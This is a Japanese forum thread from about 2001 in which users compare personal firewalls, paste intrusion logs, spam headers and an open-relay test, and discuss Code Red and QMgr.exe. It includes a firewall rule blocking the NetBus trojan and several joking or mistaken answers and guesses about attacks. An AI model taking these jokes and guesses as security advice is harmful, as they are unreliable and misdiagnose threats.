ポートスキャンしてくれるサイトとか知ってますか？

アホ？
自分でしなさい

>>420
自分の所をか?

ttp://www.sdesign.com/securitytest/index.html
ttp://security2.norton.com/us/GetBrowser.asp?venid=sym&langid=us
ttps://grc.com/x/ne.dll?bh0bkyd2

この辺で良いのでは?

cgi1.ug5150.com/portscan.cgi

>>420
お前、http://ton.2ch.net/test/read.cgi?bbs=sec&key=992171869
の59だろ？

>>424
ｿﾉﾄｵﾘ

Sygate Personal Firewall って日本語パッチなにの？

無い

使えないね
アンインストーーーーーーール

かなりアホですな

ＺｏｎｅＡｌａｒｍを使っているのですが、ローカルコンピューターに
アクセスできなくなりました。何処で設定すればよいのですか？

ZoneLog Analyser
の日本語パッチってない？

>>430
セキュリティのローカルの右下のチェックを外せ。
日本語パッチインストールすれば、簡単に設定できる。
日本語パッチは、>>2にあるだろ。

＞４３２
さんくす！！

ゾヌゥ、インストールして２４時間たったけど、なんもアラームならないな。
ルーターでみんな止まってるのか・・。

セキュリティの達人にお聞きします…

今日、Windows2000いれました。ヘルプを見ながら、ネットワーク
とプリンタの共有を削除したら、プロパティの共有窓が消えました。
これって良く判らないのですが万全のセキュリティ対策になったと
云うことなんでしょうか。。。

>>435
> 今日、Windows2000いれました。ヘルプを見ながら、ネットワーク
> とプリンタの共有を削除したら、
やり方教えてｷﾎﾞﾝﾇ

>>436

私も本題レスの待ち人です…

Windows2000のヘルプを参照し、$共有　共有ドライブの保護を
表示してその通りに、やってみてください。

※435の質問は、何のこっちゃ？判らなくなったので、貼りました。

IRCつなげるときに、ノートン博士がauthとsocks全部ブロックして
つながるまでに時間がかかるんだよね
FireWall規則で通るようにしたのに博士はブロックをやめないんだよな
ノートン使ってる人IRCすんなりつなぐ方法おしえてー

>>438　Norton先生　一時解除！！！

ノートンなんて使うなよ。
俺はウィルスバスター＋ぞぬ

ﾜﾗﾀ

質問させてください。
ゾーンアラームの日本語化パッチ当ててるんですけど、ＰＣ起動時に、VSMONが
原因でVSMON,DLLにエラーが発生しましたVSMONは終了します。というメッセージが
でて、ゾヌが起動出来なくなりました。今まで問題なく起動出来てたのに何故?
どなたかご教授お願いします。

ZoneAlermと、オミトロン一緒に使える？
設定しないといけないの？
それとどういう状況なんだろう？
PC ->Firewall->Proxy?
PC->Proxy->Firewall

>>443
つーかＺＡはlocalproxyじゃないんだけど・・

日本語化パッチとか当てるなって。
弱すぎ。

他でも見たけどなんかproxomitronとfwが一緒に使えない？って言う人多いね。全然関係ないんだけど。
まぁサーバー権限を与える事を設定というならば設定が必要とも言えるかもしれないが。

ZoneAlermのPROGRAMSのところに、
ファイルサイズが0の名前が書いてないプログラムがあるんだけど、
これってなに？

>>447
ホワイトベースです。
ネット接続の許可をＯＫしましょう。

ホワイトベースってなんですか？

>>449
ヒント！ガンダム

>>449
ヒント２！ファースト

>>449　木馬やないか！（￣□￣；）！！

野球場にあるやつじゃないの？

そらホームベースや！

あげときましょう

ウイルスソフトでも引っかからないんですけど、
どうやって駆除すればいいですか？

パブロンゴールドが効くらしいぞ。
それも顆粒がいい。

一週間くらい前からポート80を五分間隔くらいで毎回違うIPからアクセス
されるのですが、何が原因なのでしょうか？ちなみに私はNTTのフレッツADSL
です。

>>458
たいへんだ！まだ、対策をこうじていない人がいたんだ！
それはCodeRedっていうウィルスに感染しているんですよ。
このウィルスは凶悪なので、すぐにOSの再インストールし、
以後はNetに繋がないことをおすすめします。
早くしないと、大変なことになっちゃうYO！

>>458
ネタの餌食に鳴る前にコード・レッド版逝け。

かつての板違いスレッドも、あるべき板へ定着したようだな。

>>461
氏ね

>>462
荒しは触らず・騒がず・相手せず、ですよん。

211.103.56.46 (TCP Port 3520) [TCP Flags: S].
210.241.20.2 (TCP Port 4837) [TCP Flags: S].
210.160.99.130 (TCP Port 1072) [TCP Flags: S]. ns.it.iwasakinet.co.jp
210.109.62.98 (TCP Port 4476) [TCP Flags: S].
210.85.112.184 (TCP Port 3767) [TCP Flags: S]. 184.c210-85-112.ethome.net.tw
210.179.226.130 (TCP Port 3166) [TCP Flags: S].
210.216.153.20 (TCP Port 1939) [TCP Flags: S].
210.223.208.15 (TCP Port 4220) [TCP Flags: S].
210.85.17.20 (TCP Port 1193) [TCP Flags: S].
210.202.176.133 (TCP Port 2599) [TCP Flags: S].
210.95.63.197 (TCP Port 4738) [TCP Flags: S].
210.127.189.214 (TCP Port 4136) [TCP Flags: S].
210.91.86.98 (TCP Port 1807) [TCP Flags: S].
210.90.69.184 (TCP Port 1996) [TCP Flags: S].
157.252.230.12 (TCP Port 1963) [TCP Flags: S].
210.126.249.8 (TCP Port 1199) [TCP Flags: S].
210.105.70.120 (TCP Port 3049) [TCP Flags: S].
210.205.6.251 (TCP Port 1587) [TCP Flags: S].
210.166.201.105 (TCP Port 3541) [TCP Flags: S].
210.85.172.184 (TCP Port 1877) [TCP Flags: S].
210.75.52.217 (TCP Port 4486) [TCP Flags: S].
211.62.59.2 (TCP Port 2223) [TCP Flags: S].
210.77.216.51 (TCP Port 2998) [TCP Flags: S].
210.36.99.10 (TCP Port 1048) [TCP Flags: S].
210.15.12.18 (TCP Port 4474) [TCP Flags: S].
210.85.43.47 (TCP Port 4010) [TCP Flags: S].
210.111.45.211 (TCP Port 4782) [TCP Flags: S].
210.225.54.120 (TCP Port 2500) [TCP Flags: S].
212.143.20.146 (TCP Port 4405) [TCP Flags: S].
210.98.100.117 (TCP Port 1345) [TCP Flags: S].

tinyのVersion2.0.15β2用はいったいどこから落とせるんだYO!!!
日本語化パッチがあっても、本体が無いとどうにもならないYO!!!

>>465
ここの下の「Tiny Yahoo Groupのお知らせ」を見てみろYO!!!!!!!!!!!!!!!!
http://members.tripod.co.jp/eazyfox/Firewall/Tiny/TinyPFW3.htm

Secure Designで久しぶりにチェックしてみたんだけど・・・・・。
10分くらいの間に5000回って、おいっ！！！

>>466
よく分からないけど、アーカイブは手に入ったYO!!
サンクスだYO!!

61.203.0.0-61.203.127.0

教えて君でスマソ
火壁用にブロバンルータの購入検討中。
今はフレッツADSLだけど、ヤフも申し込んでいて、両方で使える
ヤツが欲しいのよ。お奨めありますか？
それから、Ipv6対応てヤツもあるけど、どんなメリットがありま
すか？

メリット
http://www.tol.ne.jp/olivemart/syosai3/AARAIS_00793.html

http://www.tv-osaka.co.jp/comet/

誰か助けてください。
韓国からのハッカーがうちのＰＣを乗っ取ってる見たいです。
もうすでにnetbiosとhttpが破壊されました。
どうすればよりのでそうか？

>>473
過去についての謝罪と反省をしなさい

>>473
ディスクスキャンとデフラグをしてください。

転載
ttp://homepage2.nifty.com/rohizuka/pa/pa_003_a.htm
あるコテハンの．．．

>>475
スキャンディスクでわ

最近APNICから激しく来ている。
何なんだ。
富士通も毎日来る。

最近素で、ポートスキャンのことをハッキングされたとかPC覗かれたとか言ってる奴
がいるような気がするんだが、夏だからか？

素だよ

>473
ネットワークから外してフォーマット後OS再インストール。
データーは汚染されているかもしれないので全部あきらめる。
netbiosとhttpを止めてからネットワークに再接続。

>>478
逆引きドメインをapnicが管轄してるだけでapnicが悪さしてる訳じゃないよ。

>>482
Tnx
じゃあ、富士通もそうなのかな。
ZAのログに山ほど記録されてうるさくてしょうがない。

>>481
http止めて大丈夫なのか？

＞473　に似た人がASAHIネットスレに居たな・・・

>ブラックアイスのメッセージなんですけど

>アタッカは自身のエントリでDNSキャッシュを破壊しています。
>これによってトラフィックを別のサイトにリダイレクトさせることが
>できます。

>>476
バカヤロー、ドキッとしたじゃねぇか

>>476
どっか逝け。ヴァカ野郎。

昨日、ぞぬを導入した者ですがまだ一度も警告を受けていません。変でしょうか？
Secure Designでチェックしたところ、「大丈夫だ」というような結果でしたが。

やれやれ
素晴らしい議論が展開しているな（ｗ
ファイアーオールって意味知ってる？
頼むから『火のオールだよ。』なんて言うなよ。ボート漕ぐわけじゃないんだからサ。
少しは勉強してきてね
『全部火』って意味だよ。

>>488
何を言いたいんだかよくわからんが？？

>>488
厨房はだまっとれ！

>>488
ぢゃ〜パーソナルファイアーオールは、
火だるま焼身自殺って意味？？

フレッツＡＤＳＬにして２週間が経ちました
最近windowsを終了する度に、ログインしてるユーザーがいます
windowsを終了しますか？と言われます
悪いなと思いながらも終了させてしまっています
波が高くなって、もう昼過ぎですが海に行ってきます

>>492
あなたのパソコンは教会みたいですね。
ジャンバルジャンが来たら銀の皿を持たせてやってくださいね。

結局フリーで初心者にお勧めのヤツって何ですか?
過去レスで「ここ読め」って所がNotFoundだったので。。。

ないです。

>>495
ないんだ。

>>494
TinyにしとけYO

>>494 自分で作れ！

>>494
ZoneAlarmがいいと思われ。日本語化パッチもあるし、導入も簡単。

おーい結局どうなんだー。>>494 じゃないけど。
なんかTinyは「初心者には設定がムズい」って印象が
あるなー。過去スレにもあったような気がする。

最初はZoneでいいんじゃないの。
俺はZone→Tiny→SygateでTinyに落ち着いたけど

Tinyだとイリア使う設定がわかんないんだけど

Zone Sygate Tiny Outpost
簡単に設定 ○ ○ × ×
細かい設定 × × ○ ○
日本語化 ○ × ○ ○
機能の豊富さ × × × ○
安心感（安定感）× ○ ○ ×
軽さ × × ○ ×

一番お薦めしないのがZone。
簡単に設定したい人は、zone使うよりもログの充実したsygate使いなさい。
日本語化は出来ないが、大した英語じゃないから大丈夫。
高機能なのが欲しければ、Outpostにしなさい
ただし、多少の重さと不安定さには耐えなければならない
貧弱なマシンの人はTinyが一番いいでしょう。安定感も抜群

Sygateに細かい設定ができない？Tinyと同じだと思うけど

>>504
すいません。間違いです。

Zoneは、日本語化もできるし
UIもグラフィカルだったりするんで、
ぱっと見、とっつきやすいかもね。

検索しても、たくさんの
日本語サイトがヒットするから、
設定も何とかなりそうだし。

でも、個人的に薦めるのはTinyかな。
俺の環境では、すごく安定してるし、
特別重たいなって感じもない。
（Win2000SP2・IE5.01SP2・PIII 1G・128M）

>>503
ログの充実って言うけど、そんなにみんなログチェックしてるの？
俺は最初の数日ぐらいしか見なかったけど

ログチェック？1日に2回ぐらいするよ。21、25、53、80、110、111、515、
8080あたりとか、トロイ狙いのポートスキャンなんてのは完全無視
だけど、たまにトラフィックログに？？？って感じのパケットが飛んで
来てたりするから、取りっぱなしにしてあるパケットログ見てチェックする。

頻繁に来るパケットなら、PacMonProとかで捕まえるんだけど、
そうそうパケットダンプ取りっぱなしにはできないし。

>>506
あなたの半分＋＠しかCPUはないけど（メモリは同じ）、俺もWin2KSP2＋IE5.01SP2＋Tinyで死ぬほど安定してるし軽い。

PersonalFirewallは大体使ってみたけど、安定してるのはTinyとSygateだと思う。
Sygateはちょっと重めなので、結局俺もTiny

Outpostは・・・・・最近のはどうですか？　＞使ってる人
一ヶ月ほど前まで使ってたんだけど、ちょっと不安定すぎて使うのあきらめた。
一日に何回か落ちてました、OSごと。

けど、パケットになんか興味が湧いてきたので、Sygateをもう一度使おうかな

バックドアのみつけ方教えてください

おれなんかつい最近までMMX166だったんですが。それでもTinyは軽い。
今はK6-2 400、96MRAM、Win95だけどやっぱりTiny以外は重い･･･

The firewall has blocked Internet access to your computer (ICMP Time Exceeded) from 210.155.132.157.

Occurred: 40 times between 01/08/19 21:16:56 and 01/08/19 21:34:50

ゾーンアラームから以上のようなメッセージがでると同じに異常に重くなったのだが・・・
どういうことだろう

>>512
ICMP Time Exceededの意味を調べてみてね。
210.155.132.157って恐らくルータかゲートウェイですよね。
恐らくその辺りでルーティングがループしています。

今日zone入れたんだが10分に一度は引っかかる。
今までウイルスバスターを信用してきた自分がいやになった。
ところで質問なんですが、ウイルスバスターのファイアーウォールはonでいいんですか？

これってどう？
http://www.mrflux.com/english/

>>514
そんなの、捨ててしまえYO!!

不正進入よりも、水没の心配がでてきた。

>>515
勧告勢

>>517
ワラタよ・・・・・・・・・ってシャレにならんじゃねぇーーかーーー

>>517
土嚢を積め。
つーか、2chに繋げてる場合じゃないだろ（藁

＞＞５１７
ほら、早くパソコン持って脱出しないと（ｗ

>>522 水没してまで2chを見ていたい君の根性に乾杯！

自分で自分を誉めてあげたいです(涙

>>514
カプセルに入ってるなんか気色悪。客には勧めない。

>>523 自分に誤爆してしまった…水没して氏のう(ﾜﾗ

ふぁいあうぉーるで、水はふせげますか？
なまえみると、だいじょうぶみたいですけど。

ｱｻｰﾘ消し飛んじゃいます。

コロッケ買って高台に避難しましょう。

速報板住人・・・（ｗ

ファイアーウォールがあるならウォーターウォールがあってもいいはずだ！
ただし中洲にとり残された場合、無効になる。

>>529
DMZで、かえって良いじゃん（ｗ

MSNメッセンジャー入れてから
「QMgr.exe」がネットにアクセスするんですけど、
コイツって一体何者？情報求む。

>>531
私も同じです。ある日（最近）メッセンジャーをアップロードしたら、
スタートアップ項目にqmgr.exeが参加してる。
そこで、チェックをはずして、qmgr.exeをクリックするとインターネットに接続
しようとします。これはスパイウェアですか？
コイツって一体何者？情報求む。尚、>>531と私は別人間です。

漏れのセキュリティは完璧だぜ。
おまえらのは所詮、厨房のクズセキュリティだ。

俺のとこへ、ウィルス送ってこいよ。
全部、弾き飛ばしてやるぜ！！

ｹﾍﾍﾍﾍﾍﾍ！

>>533
ウイルスがほしいのならそういえば言いんだ
ちなみに　　http://natto.2ch.net/test/read.cgi?bbs=pcqa&key=997485641&st=235&to=235&nofirst=true
これは彼の発言

>>531-532
気になる。
MSNメッセンジャーを入れてからっていうのは確かですか？

>>535
本当です。メッセンジャーってアップデートするか聞いてくるじゃん。
で、何時からだったか定かじゃないんだが、最近アップデートしたとたん
Qmgr.exeが走るようになったよ。
名前から機能推測すると、MSN 宛てに届いたメールのポーリング行って
いるだけだと思うし、そう信じたいのだが。
ほら、タスクトレイからポップアップするでしょ。あの機能が分離されたん
でないかい。
>>532
メールの有無をポーリングするんで、インタネに接続しようとするんでしょう。
まあ、M$だからスパイウエアかも知れませんし。
家に帰ってtcpdumpでパケット覗いてみようかなあ。

>>531-532 マイクロソフトかMSNに連絡して見たほうがいいと思います。MSNメッセンジャーは使ったことないので。

英語圏の掲示板でｳｨﾙｽがどーたらこーたらって話題の中に
Qmgr.exeっていうのが出てきてた。
ただそこの人達も「Qmgr.exeってなんだ！？」ってかんじの
雰囲気だったので、かなりあいまいな情報。すまん。

気になるので
>>536
＞家に帰ってtcpdumpでパケット覗いてみようかなあ。
この結果報告きぼーん。

>>538
Qmgr.exeのパケット覗いてみます。

>>539
まさかとは思うけど無事を祈ります。

「2chからのポート80への接続のみブロック」という設定のできる
パーソナルファイアウォールはありますか?

あります。

製品名を教えてください。

>>543
Tinyとかで、2chの鯖を全部指定して、それに対して80を塞いどけばいいんじゃないだろうか？
でも、ちょっと面倒くさいかも

>>43にはTinyではソースアドレスの指定はできないと書いてあるのです
が…できるのでしょうか?
って落として試せばいいか。

今は両方とも信頼するアドレスを指定できるよ

>>545
ソースアドレスって何?（汗

>>541
2chって、、、パッチ当ててないIISだったのか！？
>>547
送信元アドレス

>>548
いや、不正ＰＲＯＸＹ対策

>>541
「2chの利用ユーザすべてからのアクセスのみ禁止」って言いたいのだろうか。
それは技術的には無理なんですケド・・・

WINMX動かしていたら、やたら落とされるのでもしやと思いノートンインターネットセキュリティ
を買ってきましたが、WINMXに対しての設定が良くわかりません。（自動で良いのかな？）
警告が出たので、OKをしてしまったのですが・・？

補足
回線は腐れNTTのADSLですね、モデム直結ですわ

補足
オーエスはウィンドウズMEですね
それから、MXは２．６Jです。

んで今のところなんか問題あるの

あ、そうそう自動でやってるんですが、これで本当に大丈夫なのかということです。
MXのインストール時はFW使わないということでインストールしましたのでポート０の設定には
なっていません。んで特に主導でMXのポートを開けたわけでもないのですが、警告が出ます
内容は８０のポートへ接続要求が来ていますがつなげる？って聞いてきます。
ちなみにその時netstatコマンドで覗いたらpop3としてノートンアンチウイルスがいるだけです。
もちろん８０のポートへの接続は許可するつもりはありませんが・・・・
相手によりキューを受け付けない場合もあるので、気になっています。
というわけ・・よろしくお願いします。

それと、MX動かして転送中にして寝ていると翌朝おきたらPCの電源が切れているというか、強制終了状態にある
事が多いです。これって攻撃うけているのかな？

(ﾟДﾟ)ﾊｧ?

(ﾟДﾟ)ﾊｧ? なんだけどよ・・・(ﾟДﾟ)ﾊｧ? なんで
質問しているんですよ。

>>555
PCとソフトの相性が悪い。よって回避不能
------------------------解決----------------------------

>>558
最近の厨房は本当にキレヤスイ（藁

2chも終了

>>550
違います。不正ＰＲＯＸＹ対策ですってば

ttp://www.strangeworld.org/cgi-bin/bbs.cgi
ttp://www.strangeworld.org/cgi-bin/bbs.cgi
ttp://www.strangeworld.org/cgi-bin/bbs.cgi
ttp://www.strangeworld.org/cgi-bin/bbs.cgi
ttp://www.strangeworld.org/cgi-bin/bbs.cgi
ttp://www.strangeworld.org/cgi-bin/bbs.cgi
ttp://www.strangeworld.org/cgi-bin/bbs.cgi
ttp://www.strangeworld.org/cgi-bin/bbs.cgi
ttp://www.strangeworld.org/cgi-bin/bbs.cgi
ttp://www.strangeworld.org/cgi-bin/bbs.cgi
ttp://www.strangeworld.org/cgi-bin/bbs.cgi
ttp://www.strangeworld.org/cgi-bin/bbs.cgi
ttp://www.strangeworld.org/cgi-bin/bbs.cgi
ttp://www.strangeworld.org/cgi-bin/bbs.cgi
ttp://www.strangeworld.org/cgi-bin/bbs.cgi
ttp://www.strangeworld.org/cgi-bin/bbs.cgi
ttp://www.strangeworld.org/cgi-bin/bbs.cgi
ttp://www.strangeworld.org/cgi-bin/bbs.cgi
ttp://www.strangeworld.org/cgi-bin/bbs.cgi
ttp://www.strangeworld.org/cgi-bin/bbs.cgi
ttp://www.strangeworld.org/cgi-bin/bbs.cgi
ttp://www.strangeworld.org/cgi-bin/bbs.cgi
ttp://www.strangeworld.org/cgi-bin/bbs.cgi
ttp://www.strangeworld.org/cgi-bin/bbs.cgi

>>555
>netstatコマンドで覗いたらpop3としてノートンアンチウイルスがいるだけです。
ならば、塞ぐまでもなく、ポート80にパケットがいくらきても廃棄されるよ。
パーソナルファイヤウォールもルータも不要。

>もちろん８０のポートへの接続は許可するつもりはありませんが・・・・
のような心配は無用。

>相手によりキューを受け付けない場合もあるので、気になっています。
これ、意味がよくわからないんだけど、何ですか？

セキュリティの面で
基本的にモデムの設定はスタートアップガイドに書かれてる通りに設定
しておけば大丈夫なんですか？それともここは変えておかなければいけない
部分とかあるのでしょうか？
またNAT機能とはどういったものなのでしょうか？
これは設定したほうがいいのでしょうか？

私生活を地球規模に拡大する機能。

>>539
(；ﾟДﾟ)ノゴレンジャー！
なんともなかったのかな？＞Qmgr.exe

age

>>556
MＸはずっと動かしてるとCPUもリソースもガンガン食うから。
マシンが非力なのかQがたまりすぎてるか。

メモリ開放の常駐ソフトでも入れとけ。

最近警告がめっきり減った
なんか気持ちわりいな

今ネットに繋いで15分ほどの間に警告出っぱなし。
もう30回近いが、何かあったのか？

>>570
減ったね、ここ一週間くらいの間に
その前までは、一日300ほど来てたような気がするけど

コードレッドはホントに迷惑だ。
感染していることに気付かない馬鹿はホント死んで欲しい。
httpにやたらとアクセスしてくるのはこいつのせいだろ。

同じプロバイダーにこういうバカがいるとどうしようもない。
プロバイダーも警告しろよな。近辺のIPに向けてアクセスしてくるんだから。

コードレッドってゾヌアラートで防げる？
漏れ、Ｗｉｎ２ｋだから心配で・・・。

＞５７４
つうかさ、ＩＩＳさえ動いてなけりゃ平気なんじゃないの？
と思ってまだパッチも当ててないよ？やばいかな？
でもＩＩＳって、ソフトに紛れて入ってることも
あるんだって？ったく、トロイかよ！(三村
そういう場合も含めて、ＩＩＳが動いてるかどうかの確認て
管理ツールのサービスと、タスクマネージャとで見るだけで良いの？

コードレッド２はIISとは無関係じゃなかった？

悪い。勘違いしてた。

age

今日、インターネットセキュリティを入れたんですけど、30分に一回ぐらい
の頻度でリモートシステムが接続を確立しようとしていますという警告がでるん
ですけどこれはどういうことでしょうか？脅威レベルは高危険度と表示されます。
どなたかアドバイスして下さい。

警告の内容で、
「C:\WINDOWS\SYSTEM\WUCRTUPD.EXEが接続を試みようとしています。」
のようなものはでますか？

>>579
詳細を言うべし。
多分それはCodeREDじゃないのか？
漏れも捕捉プログラム作って仕掛けていたら捕まる捕まる。
２時間で２０匹だよ。まったく。

age

最近カーソルが瞬間移動したり突然ブラウザが起動したり。ファイル
が共有設定になってたりするんですけど､ｂａｃｋｄｏｏｒかなんかでしょうか？
スレ違いかもしれませんが･･･

>>583
変な動作があったときに、netstat　-a で空いてるポートを調べてみろ。

http://ton.2ch.net/test/read.cgi?bbs=sec&key=1000911947
だれかここの１の質問答えてやってくれ

ほっとけ

ゾーンアラームをインストールしようとしたら英文だった。
どうすればいい？

>>586
氏ね

>>587
英国紳士になりきる

>>589
　　ﾊﾊﾊ
　 ∧＿∧　　／￣￣￣￣￣￣￣￣￣
　（　＾∀＾）＜　　あほか この低脳が
　（ つ ⊂ ）　＼＿＿＿＿＿＿＿＿＿
　 .）　 ）　）
　（_＿）＿）　　　　　（＾∀＾）ｹﾞﾗｹﾞﾗ ｹﾞﾗｹﾞﾗ ｼﾈﾔｻﾞｲﾆﾁ

>>590
何だ、その低脳レスは・・・。

最近厨房少ないだけに急に出てくると浮くよね

[email protected]


[email protected]

[email protected]

[email protected]

[email protected]

From: [email protected]

Subject:Lucky Cherry Casino Newsletter
Date :21 Sep 2001 10:55:20 -0000
Received: from [216.191.167.10] by hotmail.com (3.2) with ESMTP id MHotMail*****; Fri, 21 Sep 2001 **:**:** -0700
Received: (qmail 31693 invoked by uid 0); 21 Sep 2001 10:55:20 -0000
From
[email protected]
Fri, 21 Sep 2001 09:44:17 -0700
Message-ID: < [email protected] >

From : [email protected]
To : [email protected]
Subject: Take a look at this and tell me what you think
Date :Wed, 19 Sep 2001 22:00:38
MIME-Version: 1.0
Received: from [211.23.7.178] by hotmail.com (3.2) with ESMTP id MHotMail*****; Wed, 19 Sep 2001 **:**:** -0700
Received: from html (slip-32-102-47-238.tx.us.prserv.net [32.102.47.238])by www.nakama.com.tw (Postfix) with SMTPid E3B05FB9CA; Thu, 20 Sep 2001 12:07:46 +0800 (CST)
From [email protected] Wed, 19 Sep 2001 20:01:07 -0700
Message-Id: < [email protected] >

From : [email protected]
To : < [email protected] >
Subject :Special Promotion Viagra (6) 50mg. doses FREE Consultation $104.99 ORDER NOW!
Date :Thu, 19 Jul 2001 21:21:18 -0400
MIME-Version: 1.0
Received: from [209.11.18.235] by hotmail.com (3.2) with ESMTP id MHotMail*****; Thu, 20 Sep 2001 **:**:** -0700
Received: from 12.64.204.77 ([12.64.204.77]) by iis2-nyc.kikko.com with Microsoft SMTPSVC(5.0.2195.2966); Wed, 19 Sep 2001 22:17:12 -0400
From [email protected] Thu, 20 Sep 2001 19:37:57 -0700
X-Priority: 3
X-MSMail-Priority: Normal
Errors-To: [email protected]
Return-Path: [email protected]
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
Message-ID: < [email protected] >
X-OriginalArrivalTime: 20 Sep 2001 02:17:14.0830 (UTC)

>>1-3

Microsoft QMgrが、いつも（PC内部から）外へアクセスしようとするのですが、これは、どういう役割を果たしているんでしょうか？

QMgrというものが、JAVA関連らしいというのはなんとか調べたんですがそれ以上はわからないので、ご存知の方教えて下さいませ。

ゾーンアラーム入れて以来、何となく気分が悪いので、全て不許可にしているんですけれど。。。

ｑｍｇｒってなんだろうね？
俺は気持ち悪いから削除しちゃったけど。

全角の「ｑｍｇｒ」もｷﾓﾁﾜﾙｲ

キューマネージャ

MSNメッセンジャー入れたら一緒に入ったような気がする。
それ以前はZoneが接続を検出したこともなかったし。

みなさまどうも有り難う。。。

そか、消しちゃっても良いんですね、消そっと。。。

MSNめっせんじゃー、入れてます。でもメッセンジャーと別にアクセスしようとするのが鬱陶しい。
でもこのフォルダ、色が薄いんですよね（属性H）。。。なんにしろ気分が悪い＜MSのあほたれ

freeなら重さは　Tiny<Sygate<Zone ですよね？
free以外も試した方、全て含めての重さを教えてもらえないでしょうか？

軽さ
Tiny＞＞＞Sygate＞＞＞＞＞＞＞＞（中略）＞＞＞＞＞＞＞＞＞Zone＞（≒）Norton
定説。
黒氷は知らん、あきらかに使えないVBなども除く。
結局初心者はZone、なれたらTiny or Sygateってことで他のは不要。

>>603
Outpostも使った事の無い奴が偉そうに言うな

>>604
だから定説っていってんじゃんよ。農豚も使った事無いし。
どこが偉そうなんだか。
ちなみに入れてみた事はあるよ。ネタにね。不具合が多すぎて
すぐTinyに戻したけど。故初心者にOutpostなぞ薦める理由が無いから除いてますが何か。

英語苦手な人は

金無い人
ゾーナラーム＋無料ウィルス
金あるなら
ノートンセット
でいいですか？

From : [email protected]
Reply-To : [email protected]
To : [email protected]
Subject : Low Cost Merchant Accounts [rytzw]
Date : Wed, 3 Oct 2001 ****

Received: from [199.217.206.66] by hotmail.com (3.2) with ESMTP id MHotMail*****
Received: (from daemon@localhost)by gatekeeper.strata-group.com (8.8.7/8.8.7) id TAA18406;Wed, 3 Oct 2001 19:11:13 -0500 (CDT)(envelope-from [email protected])
Received: from triton.strata-group.com(131.124.0.4) by gatekeeper.strata-group.com via smap (V1.3)id sma018387; Wed Oct 3 19:10:45 2001
Received: from ntserver.strata-group.com ([131.124.0.5])by triton.strata-group.com (8.8.5/8.8.5) with ESMTP id SAA00591;Wed, 3 Oct 2001 18:48:52 -0500 (CDT)
Received: from sudve.msn.com (dac.dac-group.com [208.28.136.3]) by ntserver.strata-group.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13)id TRZSJXYK; Wed, 3 Oct 2001 18:26:40 -0500
From [email protected] Wed, 03 Oct 2001 17:12:56 -0700
Message-Id: <[email protected]>
X-Mailer: Microsoft Outlook Express 5.50.4522.1200

ntserver.strata-group.com
<<< 220 ntserver.strata-group.com ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2653.13) ready
>>> HELO rlytest.nanet.co.jp
<<< 250 OK
>>> MAIL FROM:< TEST http://www.nanet.co.jp/rlytest/ requested from [email protected] >
<<< 250 OK - mail from < TEST http://www.nanet.co.jp/rlytest/ requested from [email protected] >
>>> RCPT TO:<[email protected]>
<<< 250 OK - Recipient <[email protected]>
>>> QUIT
<<< 221 closing connection

問題あり：不正な中継を受け付けます。
(199.217.206.68)
ORBS database...登録されていません。
VIX realtime block list...登録されていません。

ノートンのファイヤウォール2001をインストールしたんですが
これはWINMXでも有効になってるんでしょうか?

暗黙のブロック規則って何…

Sygateイイ！！
黒氷から乗り換えます

mail2.pyramidweb.com

From : [email protected]
Reply-To : [email protected]
To : [email protected]
Subject:Merge bills into 1 monthly payment! [dg58t]
Date:Sat, 6 Oct ***** MIME-Version: 1.0
Received: from [204.142.79.55] by hotmail.com (3.2) with ESMTP id MHotMail*****
Received: from [email protected] ([216.12.96.66]) by [email protected]
(Lotus Domino Release 5.0.3) with SMTP id 2001100623372968:909 ; Sat, 6 Oct 2001 23:37:29 -0400
From [email protected] Sun, 07 Oct 2001 02:01:13 -0700
X-Mailer: WEBmail 2.70
X-MIMETrack: Itemize by SMTP Server on Pyramid03/Pyramid Consulting Services(Release 5.0.3 |March 21, 2000)
at 10/06/2001 11:37:30 PM,Serialize by Router on Pyramid01/Pyramid Consulting Services(Release 5.0.6a |January 17, 2001)
at 10/07/2001 05:16:40 AM,Serialize complete at 10/07/2001 05:16:40 AM
Message-ID: <OF4D3671E5.320E549B-ON85256ADE.0013E9A7@LocalDomain>

既出かもしれんけど、outpost日本語対応してますね。
ってか、outpost開発者に日本語化パッチ造った人が送ったみたいだけど。

SygateかOutpost使ってる方、使用感はいかがですか？
Zoneは重いので、どっちかに乗り換えようと思ってます。
ただ、いかんせん情報が少なくて。
「Firewallと森遊びの部屋」にはひととおり目を通しましたが、
重さはどうか、安定度はどうか、などはいまひとつ書かれてませんでした。

.
adimage.dll
advert.dll
advpack.dll
amcis.dll
amcis2.dll
amcompat.tlb
amstream.dll
anadsc.ocx
anadscb.ocx
htmdeng.exe
ipcclient.dll
msipcsv.exe
tfde.dll

ある安全保障局系のサイトにアクセスしてから、
不正アクセスが増えたのです。
変に思い調べたら、
こんなファイルを植え付けられました。
スパイウエアらしいのですがウイルスバスターは認識せず、
手動で削除しました。
CIA系のHPは危険みたいです。

>>613
OutpostはAutoUpdateしないと不安定なので注意。
AutoUpadeでCurrent Buildにバージョンアップすればかなり安定する。
心配するほど重くはない。ZoneAlarmよりは軽いと思うな。
多機能なわりに設定もそこそこ簡単で日本語で使えるから、俺は悪くないと思う。

>>614
それはあるサイトにアクセスしたのは関係ないんじゃない？
FlashGetとか使ってない？
スパイウェアはウイルスじゃないんだから、ウイルスバスターとかノートンでは検出しないよ。
ま、当然だけど。

FireWall-1 の 4.0DES と 4.1strong があるんですけど、
SP って最後のやつだけあてればいいのですか？

世の中進歩したな・・・

ｄｌｌを植え付けられるサイトが存在するのか。

規則「Default Block NetBus Trojan」が 211.46.246.194,NetBus をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 211.46.246.194,NetBus
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 61.74.176.235,2093
ﾌﾟﾛｾｽ名は N/A

ガイシュツならスマソ。
ゾネ入れて２ｃｈ掲示板に書き込みしたら必ず８回、2chサーバからアタック受けるんですけど・・

ちなみに64.71.158.82 = choco.2ch.net　218.123.***.** = 漏れのＩＰ

FWIN,2001/10/13,08:52:04 +9:00 GMT,64.71.158.82:8605,218.123.***.**:80,TCP (flags:S)
FWIN,2001/10/13,08:52:11 +9:00 GMT,64.71.158.82:8608,218.123.***.**:8080,TCP (flags:S)
FWIN,2001/10/13,08:52:18 +9:00 GMT,64.71.158.82:8609,218.123.***.**:3120,TCP (flags:S)
